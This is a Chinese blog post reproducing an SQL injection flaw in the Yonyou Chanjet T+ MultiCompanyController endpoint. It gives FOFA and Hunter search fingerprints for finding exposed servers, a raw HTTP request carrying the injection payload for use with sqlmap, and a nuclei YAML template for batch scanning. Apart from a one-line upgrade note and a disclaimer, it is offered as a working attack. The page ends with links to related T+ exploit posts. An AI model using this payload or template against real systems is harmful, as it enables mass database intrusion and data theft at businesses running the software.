(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞

最新推荐文章于 2024-07-08 16:30:46 发布
最新推荐文章于 2024-07-08 16:30:46 发布
阅读量332 收藏 4
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139303434
版权

(附nuclei 批量验证文件)用友 畅捷通T+ MultiCompanyController SQL注入漏洞

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

用友 畅捷通T+ MultiCompanyController 存在SQL注入漏洞,执行sql语句,获取数据库信息。

2、资产指纹

fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”

3、漏洞复现

使用以下数据包通过sqlmap进行测试

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Content-Length: 53
Content-Type: text/plain
Cookie: ASP.NET_SessionId=; sid=admin
Accept-Encoding: gzip, deflate

{"accNum": "6'", "functionTag": "SYS0104", "url": ""}

在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-sqli

info:
  name: chanjettplus - SQL Injection
  author: XXX
  severity: critical
  description: |
    There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
  reference:
    - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880
  tags: chanjettplus,sqli

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        Cookie: ASP.NET_SessionId=; sid=admin

        {"accNum": "6'", "functionTag": "SYS0104", "url": ""}
    matchers:
      - type: word
        words:
          - "附近有语法错误"
        part: body

修复方式

关注用友官网,及时升级至最新版本。

nglj9527
关注
专栏目录
漏洞复现】用友-捷通T+-SQL注入-keyEdit
知黑而守白
07-05 625
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit.aspx接口处存在SQL注入漏洞 ,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0xSec
06-14 3886
捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
捷通T+SQL注入漏洞
holyxp的博客
07-27 900
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实现远程命令执行。
用友捷通T+ keyEdit sql注入漏洞
Keepb1ue的博客
05-11 596
捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括:采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。
漏洞复现】用友捷通T+ SQL注入漏洞
2301_79099363的博客
07-13 1500
漏洞复现】用友捷通T+ SQL注入漏洞
漏洞复现】用友捷CRM存在SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
05-06 1177
用友捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。用友捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。
漏洞复现】用友-捷通T+-Ufida-SQL注入
知黑而守白
01-22 355
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
【1day】复现用友捷通T+前台命令执行漏洞
记录并分享学习安全的知识点..
07-07 723
捷通T+是一款主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友 捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞,导致远程命令执行,控制服务器
漏洞复现】用友-捷通T+-App_Code-远程命令执行
知黑而守白
01-22 241
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。用友捷通 T+某模块存在远程命令执行漏洞。攻击者可以通过构造恶意的数据包,成功入并执行恶意命令,可能导致系统敏感信息泄露、篡改、服务器接管或其他严重后果。
用友捷通TPlus DownloadProxy.aspx任意文件读取漏洞+远程命令执行漏洞
薛定谔嘚喵博客
08-31 473
1.该系统在DownloadProxy.aspx存在任意文件读取漏洞。 2.用友捷通Tplus存在前台远程代码执行漏洞,攻击者可利用GetStoreWarehouseByStore 方法入序列化的payload,执行任意命令。最终造成服务器敏感性信息泄露或代码执行。
漏洞复现】捷通T+ App_Code.ashx 远程命令执行漏洞
凝聚力安全团队
06-17 872
捷通T+ Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore 接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。
捷CRM 存在SQL注入+后台文件上传漏洞
qq_58091216的博客
12-07 1202
捷CRM是面向小企业全力打造的简单、实用的客户关系管理应用!捷CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。捷CRM系统存在SQL注入和后台文件上传漏洞,攻击者可以通过上传木马执行任意命令,获取服务器管理权限。
捷通T+ 反序列化漏洞复现(QVD-2023-13615)
0xSec
06-23 4543
捷通 T+ 存在.net反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。
nuclei 批量验证文件用友 捷通T+ getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。
nglj9527的博客
05-29 359
用友 捷通T+ getdecallusers 存在信息泄露漏洞,可获取系统用户个人信息。
捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
la-大白
10-28 3292
捷通T+软件任意文件上传漏洞
捷通TPlus DownloadProxy.aspx 存在任意文件读取漏洞
holyxp的博客
07-27 302
捷通T+专属云适用于需要一体化管理的企业,财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。
[未公开0day]捷通T+存在文件上传漏洞
最新发布
LiangYueSec的博客
07-08 441
[未公开0day]捷通T+存在文件上传漏洞
捷通T+ InitServerInfo.aspx SQL漏洞复现
0xSec
03-13 929
由于捷通T+的InitServerInfo.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值